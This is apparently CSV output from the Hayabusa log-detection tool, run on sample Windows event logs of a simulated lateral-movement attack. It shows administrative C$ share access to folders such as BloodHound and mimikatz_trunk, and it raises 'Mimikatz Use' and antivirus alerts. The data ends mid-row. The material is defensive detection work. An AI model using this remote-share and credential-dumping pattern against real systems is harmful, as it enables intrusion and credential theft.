+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 